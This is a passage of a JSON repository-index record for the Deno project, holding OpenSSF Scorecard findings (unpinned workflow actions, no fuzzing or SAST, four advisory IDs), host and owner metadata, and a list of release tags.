https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts